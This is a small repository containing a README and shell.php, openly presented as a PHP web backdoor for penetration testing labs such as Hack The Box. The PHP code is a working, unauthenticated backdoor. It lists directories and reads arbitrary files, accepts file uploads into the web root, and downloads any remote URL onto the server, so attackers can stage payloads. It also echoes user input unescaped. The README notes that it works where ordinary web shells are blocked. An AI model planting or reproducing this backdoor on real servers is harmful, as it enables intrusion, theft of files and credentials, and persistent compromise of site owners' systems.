├── README.md
└── shell.php


/README.md:
--------------------------------------------------------------------------------
 1 | # Simple PHP Web Backdoor
 2 | 
 3 | <img src="https://user-images.githubusercontent.com/22043590/133885536-edd18c74-2eae-4a0a-b6a4-0d3603b532ab.png" width="450" />
 4 | 
 5 | A simple PHP web backdoor allows you to retrieve directory/file contents and upload file(s) from the local machine or remote URL.
 6 | 
 7 | It is handy if standard PHP web shells are restricted (e.g. system function disabled and such). I used this when performing penetration testing on security labs and Hack The Box, and it works great!
 8 | 
 9 | ## Features
10 | 
11 | ### Retrieve File/Scan Directory
12 | 
13 | <img src="https://user-images.githubusercontent.com/22043590/133885503-476cad23-978d-4b19-827d-3545c198993b.png" width="400" />
14 | 
15 | Enter the path you want to explore.
16 | 
17 | If it's a directory, it will list all the items in the directory. Otherwise, it will show the content of the file.
18 | 
19 | ### Upload File From Your Local
20 | 
21 | Upload any file from your local computer. You can upload one or more files.
22 | 
23 | The backdoor will save the file in the same working directory.
24 | 
25 | ### Upload File From URL
26 | 
27 | Upload any file from a remote URL. You need to specify the output file name and the URL of the remote file.
28 | 
29 | Make sure the host can access the remote file.
30 | 
31 | ## Disclaimer
32 | 
33 | This script is only for permitted penetration testing and security research, and I will not be responsible if you use it for illegal activities.
34 | 


--------------------------------------------------------------------------------
/shell.php:
--------------------------------------------------------------------------------
 1 | <b>Retrieve File/Scan Directory</b> <br />
 2 | Current file path: <?php echo __FILE__; ?> <br />
 3 | <form method="GET" action="">
 4 |     Path: <input type="text" name="path" size="50" value="<?php if (isset($_GET['path'])) { echo $_GET['path']; } ?>" />
 5 |     <button type="submit">Go</button>
 6 | </form>
 7 | <pre>
 8 | <?php
 9 | if (isset($_GET['path'])) {
10 |     if ($_GET['path'] == '') {
11 |         $path = './';
12 |     } else {
13 |         $path = $_GET['path'];
14 |     }
15 |     echo '<b>Realpath:</b> ' . realpath($_GET['path']) . '<br />';
16 |     echo '<b>Type:</b> ';
17 |     if (is_dir($path)) {
18 |         echo 'Directory <br />';
19 |         foreach (scandir($path) as $data) {
20 |             echo $data . "<br />";
21 |         }
22 |     } else {
23 |         echo 'File <br />';
24 |         print_r(file_get_contents($path));
25 |     }
26 | }
27 | ?>
28 | </pre>
29 | <hr />
30 | <b>Upload File From Your Local</b> <br />
31 | <form method="POST" action="" enctype="multipart/form-data">
32 |     File(s): <input type="file" name="uploads[]" multiple="multiple" required="required" />
33 |     <button type="submit">Upload</button>
34 | </form>
35 | <?php
36 | if (isset($_FILES['uploads']) && count($_FILES['uploads']) > 0) {
37 |     $total = count($_FILES['uploads']['name']);
38 |     for ($i = 0; $i < $total; $i++) {
39 |         $tmpPath = $_FILES['uploads']['tmp_name'][$i];
40 |         if ($tmpPath != '') {
41 |             $newPath = './' . $_FILES['uploads']['name'][$i];
42 |             if (move_uploaded_file($tmpPath, $newPath)) {
43 |                 echo 'Successfully uploaded ' .$_FILES['uploads']['name'][$i] . '<br />';
44 |             } else {
45 |                 echo 'Unable to upload ' .$_FILES['uploads']['name'][$i] . '<br />';
46 |             }
47 |         }
48 |     }
49 | }
50 | ?>
51 | <hr />
52 | <b>Upload File From URL</b> <br />
53 | <form method="POST" action="">
54 |     Filename to save: <input type="text" name="save_name" size="30" required="required" /> <br />
55 |     URL: <input type="text" name="url" size="50" required="required" />
56 |     <button type="submit">Upload</button>
57 | </form>
58 | <pre>
59 | <?php
60 | if (isset($_POST['save_name']) && isset($_POST['url'])) {
61 |     if (file_put_contents($_POST['save_name'], file_get_contents($_POST['url']))) {
62 |         echo 'Successfully uploaded ' . $_POST['save_name'];
63 |     } else {
64 |         echo 'Unable to upload ' . $_POST['save_name'];
65 |     }
66 | }
67 | ?>
68 | </pre>
69 | 


--------------------------------------------------------------------------------